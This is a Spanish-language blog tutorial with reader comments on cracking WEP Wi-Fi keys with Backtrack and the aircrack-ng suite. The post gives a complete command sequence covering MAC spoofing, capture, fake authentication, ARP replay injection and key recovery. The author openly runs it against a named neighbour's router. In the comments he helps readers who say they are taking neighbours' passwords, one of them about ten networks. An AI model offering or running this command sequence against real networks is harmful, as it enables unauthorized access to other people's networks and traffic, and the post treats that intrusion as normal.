Hackear redes WEP con BacktrackPosted on marzo 14, 2010 by Guerrix

Bien en lo siguiente dar un pequeo tuto de como Hackear redes WEP o 2wire con Backtrack 4.

Que necesitamos:

La imagen de Backtrack 4, Descargar USB wireles Linksys WUSB54GC(Color Gris)

Nota: Hay una nueva USB wireles Linksys WUSB54GC es de color negro, este tutorial no ha sido probado para esta nueva versin de chipset, segn lectores indican que Backtrack 4 no reconoce el nuevo chipset de la Linksys WUSB54GC Negra.

Ya que descarguemos la imagen de Backtrack 4 podemos quemarlo en un CD(usarlo como live CD) o usar un virtualizador como virtualbox para montar la imagen, usen el que mas se le facilite.

Una vez dentro de Backtrack con nuestra memoria USB wireles Linksys WUSB54GC conectada abrimos una consola y ponemos lo siguiente para identificar nuestra interfaz de red.

1.

airmon-ng

Despus de identificada nuestra interfaz hacemos lo siguiente (en mi caso es wlan0), en la misma ventana ponemos

1.

airmon-ng stop wlan0

y despus

1.

airmon-ng start wlan0

Con eso tendremos algo asi:

Despus de eso, cambiamos la macaddress de nuetro dispositivo ponemos lo siguiente:

1.

macchanger m 00:11:22:33:44:55 wlan0

y veremos algo como esto:

Con lo anterior le cambiamos la macaddress de manera temporal a la USB wireles Linksys WUSB54GC para que sea mas fcil de recordar.

Despus de eso en la misma consola ponemos lo siguiente

1.

airodump-ng wlan0

Para escanear las redes que tenemos a nuestro alrededor, aparecer algo como esto:

Donde notamos lo siguiente en mi caso hackeare la red de mi vecina adriana70 tenenmos que fijarnos en los siguientes datos el channel (Columna CH) y en la macaddress de nuestra vctima(columna BSSID) estos datos estn sealados en la imagen anterior.

ahora en esa misma ventana precionamos ctrl+c, aparecera la linea de comando y ponemos la siguiente instruccin teniendo precaucin de sustituir los datos entre comillas con la informacin de nuestra vctima.view plaincopy to clipboardprint?

1.

airodump-ng -c "channel" -w guerrix --bssid "mac-a-atacar" wlan0

para el caso de mi vctima quedara as:

1.

airodump-ng -c 10 -w guerrix --bssid 00:1D:5A:19:05:11 wlan0

Donde channel lo sustitu por 10 y mac-a-atacar por 00:1D:5A:19:05:11, los datos de mi vecina. Una ve que damos enter veremos algo como esto:

El recuadro en rojo debajo de #DATA indica la cantidad de paquetes que hemos inyectado probablemente lo tengan en 0 o un numero demasiado bajo para cambiar eso hacemos lo siguiente:

Abrimos una nueva terminal sin cerrar la que tenamos, ponemos el siguiente comando teniendo cuidado de sustituir el texto entre comillas con los datos indicados:view plaincopy to clipboardprint?

1.

aireplay-ng -1 0 -a "mac-a-tacar" -h "mi-mac" wlan0

Que dando algo asi, recuerden que al principio cambiamos nuestra mac por 00:11:22:33:44:55

1.

aireplay-ng -1 0 -a 00:1D:5A:19:05:11 -h 00:11:22:33:44:55 wlan0

al dar enter y si no tenemos ningun error ponemos el siguiente comando de igual manera teniendo cuidado de sustituir el texto entre comillas con los datos indicados:view plaincopy to clipboardprint?

1.

aireplay-ng -3 -b "mac-a-tacar" -h "mi-mac" wlan0

En mi caso quedara:

1.

aireplay-ng -3 -b 00:1D:5A:19:05:11 -h 00:11:22:33:44:55 wlan0

Al dar enter a esta ultima instruccin notaremos que empezamos a inyectar los paquetes y si checamos la terminal que nos indica el #DATA veremos como ese valor se incrementa rpidamente:

Una vez que el valor de #DATA pase los 30000 paquetes abrimos otra terminal, sin cerrar las que tenemos abiertas y ponemos lo siguiente: Nuevamente cuidado de sustituir lo que nos pide.view plaincopy to clipboardprint?

1.

aircrack-ng -b "mac-a-atacar" guerrix-01.cap

En mi caso quedara as:

1.

aircrack-ng -b 00:1D:5A:19:05:11 guerrix-01.cap

Despus de dar enter si obtenemos un KEY FOUND! entonces felicidades han hackeado la red.

Pero de no ser asi no se mortifiquen esperen a que el #DATA incremente a 60000 e ingrecen de nuevo el comando anterior y si sigue fallando intenten a los 90000 y as dejen que se valla incrementando hasta que encuentren la clave. El tiempo que se emplee en descifrar la clave varia segn la dificultad de esta ultima.

This entry was posted in Internet, Linux, Software Libre, Solucin Problemas, Tecnologa, Virtualizacion by Guerrix. Bookmark the permalink.

164 THOUGHTS ON HACKEAR REDES WEP CON BACKTRACK

Comment navigation Older Comments

1.

Raramury on abril 21, 2011 at 6:42 pm said: tengo un preblema con mi bactrack en vmw cuando pongoaircrack-ng 2wire829-01.cap me dice failed ivs try 5000 y le doy y me dice try 10000 ivs que puedo hacer? mi e-mail: yugi_158@hotmail.comReply

Guerrix on abril 26, 2011 at 5:03 pm said: Que tal Raramury, no desesperes por lo general para obtener resultados necesitamos tener unos 30,000 paquetes tu apenas lo intentas a los 5,000. En algunos casos a los 5,000 es mas que suficiente, pero para ir a la segura se recomienda tener 30,000 se paciente e intenta cuando tengas esa cantidad de paquetes.

Saludos y SuerteReply

2.

raquel on mayo 1, 2011 at 1:01 pm said: tengo un problema a la hora d acelerar los paquetes se me queda el data en 0 y no envia paquetes ni nada xk puede ser? soy novata jeje graciasReply

Guerrix on mayo 2, 2011 at 5:12 pm said: raquel a como lo veo puede ser por 2 razones, una que no tu tarjeta no este inyectando los paquetes y la otra que no sea una red WEP.

Checa bien eso, posiblemente por all este tu problema

Saludos y suerte!Reply

3.

daniel on mayo 3, 2011 at 4:02 am said: hola guerrix esta es una pregunta fuera del tema pero quizas sepas del tema y me puedas responder mi duda es el siguiente estoy dando Internet por antena solo a 1 pc debe esta a un 1 kilmetro y medio oh 2 por ahora la pc que quiero dar seal si capta ahorita esta conectada de antena directo ala pc el alcance marca casi a 20 dbi moviendo sube a un poco mas de ratos baja y se pone lento como tambin se pone rpido en ratos yo quera ponerle un access point modo cliente pero mi duda es que tanta fuerza le da un ejemplo ahorita sta en 20 dbi en cuanto le pude subir usando un ap si va a ser mejor mas estable todava no compro el access point para ponerlo en modo cliente pero quisiera saber si seria buena para comprarla de antemano gracias.Reply

Guerrix on mayo 3, 2011 at 5:28 am said: Pues siempre hay altas y bajas en las seales inalambricas pues los factores geograficos importan mucho 2 km es una muy buena distancia ahora, Seria un poco descuidado de mi parte darte una recomendacion, te sugiero esta pagina para que hagas calculos y en base a eso saques una mejor conclucion.

Saludos y Suerte

Wireless Calculators

Reply

4.

rodolfo on mayo 4, 2011 at 2:56 pm said: hola tengo problema .. a la hora d acelerar los paquetes con la linea de comando aireplay-ng -3 -b 00:1D:5A:19:05:11 h 00:11:22:33:44:55 wlan0 este #DATA va bien lento read12546 packets (got 0 ARP requests and 0 ACKs), sent 0 packets.(0 pps) y esto es lo q me aparece!! por lo q veo no lo esta enviando, lee packetes pero el envio queda en 0 y he dejado la pc trabajando horas y lo mas q he llegado a alcanzar son 800 ivs.. y la asociacion del la reb esta correcta aunq me cuesta un poco que me la asocie.. Q problema podria ser.!! ayuda porfa

saludos GRacias.!!Reply

Guerrix on mayo 4, 2011 at 6:16 pm said: rodolfo lo unico que se me ocurre es que es estas muy lejos de la fuente :S, y apenas y puede mantener conexin por lo que la mayora de lo paquetes inyectados se pierden :S.

Saludos.Reply

ok..

rodolfo on mayo 4, 2011 at 10:03 pm said:

Gracias..!!

Reply

Charlie on agosto 23, 2011 at 2:24 am said: Esto posiblemnete se de a que la red que estas tratando de decifrar no esta siendo utilizada, por ende no puedes insertar los paquetes, sigue intentando en cuanto la red este en uso se incrementaranReply

5.

daniel on mayo 5, 2011 at 9:07 pm said: hola guerrix denuevo de antemano muchas gracias por las respuestas tengo otra duda staba configurando mi access point y hay una opcin para configurar 54Mbps (802.11g 802.11b) o 11Mbps ( 802.11b) cual de las 2 es mejor en el manual me dice que 11Mbps ( 802.11b) Solo para estaciones inalmbricas. no se cual de las 2 es mejor soy novato en estos temas de redes inalambricas.Reply

Guerrix on mayo 7, 2011 at 6:12 pm said: Bueno la letra al final de los dgitos indica el estndar de transferencia:

802.11b: tiene una velocidad mxima de transmisin de 11 Mbit/s, la velocidad mxima de transmisin con este estndar es de aproximadamente 5,9 Mbit/s sobre TCP y 7,1 Mbit/s sobre UDP.

802.11g: es la evolucin del estndar 802.11b, pero opera a una velocidad terica mxima de 54 Mbit/s, que en promedio es de 22,0 Mbit/s de velocidad real de transferencia. Es compatible con el estndar b, sin embargo, en redes bajo el estndar g la presencia de nodos bajo el estndar b reduce significativamente la velocidad de transmisin.

Pero si el manual dice que para propsitos del access point es mejor la 802.11b, sugiero sigas esa recomendacin.

Saludos y Suerte.Reply

6.

david on mayo 8, 2011 at 4:42 pm said:

quisira saber como obtener clave de WEP donde el mb es 54e

graciasReply

Guerrix on mayo 10, 2011 at 5:29 pm said: En teoria es el mismo procedimiento, solo que te da la clave en hexadecimal tu tienes que hacer la conversin a decimalReply

7.

matrixx on mayo 26, 2011 at 3:02 am said: holaa cumpa mira ago todo loke me dices tu y funciona de maravilla pero ay un problema al cargar los paketes el data no sube y se queda pegado en un numero fijo en mi caso esta en 35 data y no sube mas!!! y no es porque este lejos de la seal de echo la tengo al lado de mi casa los paketes suben muy rapido pero el data no aumenta que sera me puedes ayudar porfabor amigo se agradece y responde a la brevedadReply

8.

matrixx on mayo 26, 2011 at 3:04 am said: miraa yaa a pasado mucho tiempo desde que te mande el comentario y el data aun sigue igual 35 dataReply

Guerrix on mayo 26, 2011 at 4:24 pm said: Que tal matrixx, ultimamente algunos lectores se han quejado de eso pero con las redes que terminan en e; 2WIRE1234e , no es tu caso? o tambien, asumo que tienes la tarjeta indicada pues de no ser as algunas tarjetas no soportan inyeccin de paquetes.

Saludos y Suerte.Reply

9.

matrixx on mayo 26, 2011 at 3:08 am said:

aaa seme olvidaba uso bactrack 4 r2 no creo que aya problemas porque los comandos son iguales y otra cosa cuando inyecta los paketes antes de los numeros dice .Notice got a deauth/disassoc packet. is the source MAC associated? eso dice mi amigo aver si me puedes ayudar porfaReply

10.

jorge on mayo 31, 2011 at 9:48 pm said: hola, me entere que se pueden desencriptar las claves de redes wifi, por lo que solito me orienten como se debe hacer, que dispositivos y programas necesito para obtener las claves de redes wifi de mis vecinos. tengo una computadora con windows xp sp2, tarjeta de red integrada (NO inalambrica), access point marca ALFA 802.11 b/g (la cual detecta varias redes WIFI de mis vecinos pero todas estan encriptadas con clave WEP), tengo backtrack 4 (la cual lo ejecuto con virtualbox.desde windows). necesito algo mas? o que mas debo hacer? gracias por la respuestaReply

Guerrix on mayo 31, 2011 at 10:53 pm said: Que tal jorge, pues solo es cuestin de que leas a detalle el post all tienes una opcin de que necesitas con exactitud para lograr tu cometido.

Suerte y SaludosReply

11.

Guerrix on junio 28, 2011 at 6:31 am said: No es tanto la distancia sino la intensidad con la que captas la red, aun que la fuente de senal este en la casa de a lado, pero si hay muchos muebles o paredes o elementos que hagan debil la senal tendras poblemas y se tornara lenta la inyeccion pues muchos paquetes se perderan.

Saludos y Suerte.Reply

12.

michell on junio 28, 2011 at 7:16 am said: hola, gracias primero que nada..!!por tu respuesta..!! que cres que me di cuenta de algo, que si lo ago con mi pc es rapido muy rapido se tarda cinco minutos en inyectar pero si lo ago en mi lap tarda como dos horas para llegar a los 20000 ya lo intentte en cd live y pasa lo mismo..!!! cres que sea la maquina tanto la pc como la lap tienen 1 gb de ram, bueno gracias espero me puedas ayudar con esto ya tedebemos mucho..!!!Reply

Guerrix on junio 28, 2011 at 4:31 pm said: Si que es algo raro, posiblemente se deba a la memoria pero para ser franco no me haba pasado antes.

Lo importante es que ya pudisteReply

13.

alvaro on julio 1, 2011 at 6:18 am said: Excelente articulo compadre, una pregunta. Tengo un Macbook Pro, es 100% necesaria la USB Wireless? Saludos!Reply

Guerrix on julio 2, 2011 at 12:55 am said: Si, hasta donde tengo entendido las tarjetas de red de las macbook pro no soportan inyeccin de paquetes :S

SaludosReply

14.

michell on julio 2, 2011 at 5:47 am said: gracias si es la compu bueno gracias por todo !! jep suerte hasta pronto y mil gracias por toda la ayuda..!!Reply

15.

Francisco Javier Martn Lpez on julio 3, 2011 at 7:22 pm said: Hola amigos: Les cuento que yo uso BT5 (como liveUSB e instalado en disco duro). Aunque he logrado desencriptar contraseas WEP desde los dos tipos de arranque, debo mencionar que si vara el modo en que lo hago, por ejemplo, arrancando el BT5 desde el disco duro (ya instalado) no he podido lograr el handshake utilizando el comando: aireplay-ng -1 0 -a mac interface, por tal motivo no puedo proceder a inyectar paquetes por medio del comando: aireplay-ng -3 -b mac interface entonces como no inyecto paquetes me tengo que esperar a capturarlos naturalmente. Por otro lado arrancando desde liveUSB si puedo lograr el handshake y posteriormente la inyeccionde paquetes provocando que se disparen los #data o ivs. Otra cosa, a veces, aun con liveUSB, haciendo handshake e inyectando paquetes no puedo lograr que se disparen los #datas aunque la inyeccin de paquetes valla a 1000xhora. pero esto solo sucede con unas pocas redes. No logro entender porqu a veces si funciona y otras no. Si alguen sabe de esto y puede darme una pista de algo que ande mal se lo agradecer.

Reply

Guerrix on julio 5, 2011 at 1:00 am said: Que tal Francisco, como bien lo dice michell el problema muy posiblemente se debe a la calidad de la seal que recibes, pues puede que allas hecho el handshake pero si la intensidad de la seal no es muy buena la mayora de los paquetes que generas se perdern :S, ahora salvo que le des algn otro uso a BT (ya instalado) sugiero uses el Live o uno virtualizado, pues es mas facil de arrancar y ahorras unos cuantos gb de disco

Saludos y Suerte.Reply

16.

michell on julio 4, 2011 at 11:51 pm said: hola amigo si bien no me equivoco tu problema es por la distancia que tiener en el pwr, ami me pasa igual y noto que cuando en pwr estoy en -68 -58 -48 me inyecta rapido pero cuando pasa a 70 ya no inyecta nada o se pasma espero pueda servirte este dato si no que nos ayude nuestro amigo Guerrix que eslo que recomienda..!!!Reply

17.

Francisco Javier Martn Lpez on julio 13, 2011 at 7:27 pm said: Hola Guerrix, gracias por tu respuesta, pero la intensidad me llega al 100%, adems en el caso del BT5, lo uso como sistema operativo principal, bueno, pero ya no me preocupare por eso porque me robaron mi netbook y no podr robar ms contraseas, yo se que esto no viene al caso pero lo comparto porque creo que as se comporta el Karma. Saudos.

Reply

18.

michell on julio 19, 2011 at 1:05 am said: ni lo digas por que ya seria karma para todos nosotros, jep saludos es una pena por lo de tu netbookReply

19.

adriana on agosto 4, 2011 at 12:15 am said: ayuda por favor !!!! llevo usando bactrack 4 desde hace unos meses y he conseguido varias seales con exito y lo he estado intentando nuevamente ya ke me cambiaron las contraseas, he repetido los mismos paso de siempre y algunas cosas nuevas por ke me he percatado ke todo fuciona menos los data en una seales niniquira pasan de cero y otra pasa horas

inyectando trafico y somo consigo poco menos de 5000 mi usb inalambica es alfa 802.11 b/g y las seales son muy buenas ayuda por fa que estoy haciendo mal??Reply

Guerrix on agosto 5, 2011 at 10:53 pm said: Bueno posiblemente cambiaron de modem, en mi region la compaa proveedora de esos modems ha estado cambiandolos por el problema de seguridad, pienso pueda ser una de las razones mas viables y mas si mencionas que ya has hecho el procedimiento en otras ocaciones y has conseguido las contraseas. Cuentanos que fue de ultimo

Saludos

Reply

adriana on agosto 8, 2011 at 11:53 pm said: pues ahora que lo mencionas puede ser por ke habia sacado 10 cuntas aproximadamente sin problemas y todas fueron cambiadas en cuestion de semanas solo tengo 3 ke funcionan y no me gustan ya que son muy letas pero en fin ya he vuelto ha intentar el proseso el dia de hoy sin exito solo consegui que subieran los data hasta los 1654 y hay se quedo los demas seguian subiendo pero data no y es el unico ke sube los demas usuarios siguen en cero y descubri una nueva pero solo consegui 2 data en dos horas cambie mi wlan por una de mas alcance y nada ke mas puedo hacer ??Reply

20.

javier on agosto 4, 2011 at 9:48 pm said: hola haber si me pueden aydar estoy usando backtrack pero solo desde el cd atravez de virtual box y corre de lo mas bien inserto los cidigos todo bien pero la data jamas sube y si sube subne 12 hasta 17 y eso que demora como una hora estado leyendo y si tengo buen pwr me sale en 65 68 pero igual no corre es mas abajo sale packets y ahi incrementa rapidamente pero el data no sube nada a lo mucho de 17 pasa ah 18 si me pueden dar la salucion se los agradeceria muchoReply

Guerrix on agosto 5, 2011 at 10:56 pm said: Es dificil dar una solucion, pues de entrada pueden ser varios los problemas

1. Que tu USB Wireless no reciba buena senal del emisor. 2. Que no sea una red WEB 3. O que tu USB Wireless no soporte inyeccion de paquetes.

Lo anterior son de las mas comunes, espero identifiques tu problema y encuentres solucion

Saludos

Reply

21.

JORGE MEDINA on agosto 9, 2011 at 3:50 pm said: Tus respuestas y tutoriales osn muy interesantes, sabes tengo una linea con excelente recepcion sin embargo a la hora que ataco la data no avanza su PWR 37 y ya llevo un buen rato en esto y la data a las gustas subio 138 de estar en cero por otro lado visualizada la linea en windows es excelente que debo hacer agradecere tu respuesta enormente.Reply

Guerrix on agosto 10, 2011 at 5:00 am said: Posiblemente se debe al mismo problema que tiene adriana (2 respuestas arriba).

Saludos.Reply

22.

Maxmind on agosto 9, 2011 at 8:44 pm said: Buenas quisiera saber porque cuando pongo airodump-ng mon0 , me muestra las redes pero todas tienen #data 0 y #/s 0 todas inclusive la mia.. como soluciono esto ? desde ya gracias !Reply

Guerrix on agosto 10, 2011 at 5:01 am said: Necesitas inyectar los paquetes, hay que hacer el handshake continua con el tutorial y encontraras la solucion (y).Reply

23.

crash on agosto 9, 2011 at 10:49 pm said: BUENO LO QUE PASA ES QUE QUIERO HAKIAR UNA RED PERO CUANDO ESCRIBO AIRMON-NG NO ME DA LA INTERFACE TENIENDO EN CUENTA QUE ISTALE S.O. EN UN VIRTUAL BOX POR USB PERO ME DICE QUE TENGO UN PROBLEMA CON LA MAC Y NO SE QUE ASER SI ALGEN ME PUEDE AYUDAR LE AGREDESERIA MUCHISIMOReply

Guerrix on agosto 10, 2011 at 5:03 am said:

Puede ser que tu USBWireless no esta soportada por el Backtrack, checa en la pagina oficial las compatibilidades con tu tarjeta.

Saludos.Reply

24.

Javier on agosto 12, 2011 at 4:17 am said: Hola, Me llama mucho la atencion el backtrack de linux, lo he estado usando, con fines educativos para la formacion de mi carrera, aunq tngo una duda, cuando el BSSID es diferente y consta de un espacio, aunque el cifrado sea WEP,hemos hackeado bssid ejemplo INFINITUM9D512F, pero que pasa con aquellas que constan de un espacio, esa es mi duda gracias Guerrix

Reply

Guerrix on agosto 12, 2011 at 7:38 pm said: Creo te refieres al ESSID pero puedes usar el BSSID que es la mac address, para el caso es lo mismo.

Nos cuentas como te fue.Reply

25.

jose miguel gonzalez on agosto 17, 2011 at 1:22 am said: hice todos los pasos de manera positiva me arroja este resultado

key found: 55:60:07:66:00

que hago con esto intente pasarlo a decimal pero el numero q me dio osea 85967102 no es la contrasea correcta entonces espero haber si me puedes ayudarReply

26.

jose miguel gonzalez on agosto 17, 2011 at 2:25 am said: tengo una duda mas grande aun resulta que tome el resultado que les mostre arriba sin puntos y me logro entrar pero en windows 7 me aparecen conectado con acceso a internet pero no me da internet probe en 2 equipos y nada pero probe en un equipo con xp con la misma contraseay desde el estoy navegando pero necesito q sirva en windows 7 que debo hacerReply

27.

roberto on agosto 25, 2011 at 10:48 pm said: hola, excelente el tutorial. Perto tengo una duda yo tengo el BackTrack 5 puedo utilizar los mismos comandos??Reply

Guerrix on agosto 28, 2011 at 6:54 pm said: No he provado BT5 pero supongo que si han de ser los mismos. Si lo intentas comentas como salio

Saludos.Reply

28.

Alfonso on agosto 29, 2011 at 4:54 pm said: Hola Guerrix que buena honda que haya personas como tu, que de forma simple y sencilla compartan sus conocimientos sin mayor problema. hojala y todos aprendamaos de ti hermano. Cuidate mucho , saludos y que dios te bendigaReply

29.

Juan Manuel Saldaa on septiembre 1, 2011 at 2:41 am said: oie disculpa una pregunta para hackear claves wpa2-psk es el mismo proceso?Reply

Guerrix on septiembre 14, 2011 at 5:47 pm said: No, esta requieren ataques mas especificos, como Diccionario o Fuerza Bruta.

SaludosReply

30.

Miguel on septiembre 3, 2011 at 2:09 am said:

hola que tal, mira he descifrado unas cinco redes hace tiempo sin ningun problema dependiendo solo de la intensidad de la seal, y ahora quiero hacerlo otra vez con unas redes nuevas y a la hora de inyectar no suben los DATAS , los ARP se quedan en 2 y los PPS en 499, lo he intentado varias veces y sigue igual, agradeceria tu punto de vista gracias. Saludos.Reply

Guerrix on septiembre 14, 2011 at 5:45 pm said: Bueno posiblemente cambiaron de modem, en mi region la compaa proveedora de esos modems ha estado cambiandolos por el problema de seguridad, pienso pueda ser una de las razones mas viables y mas si mencionas que ya has hecho el procedimiento en otras ocaciones y has conseguido las contraseas.

Saludos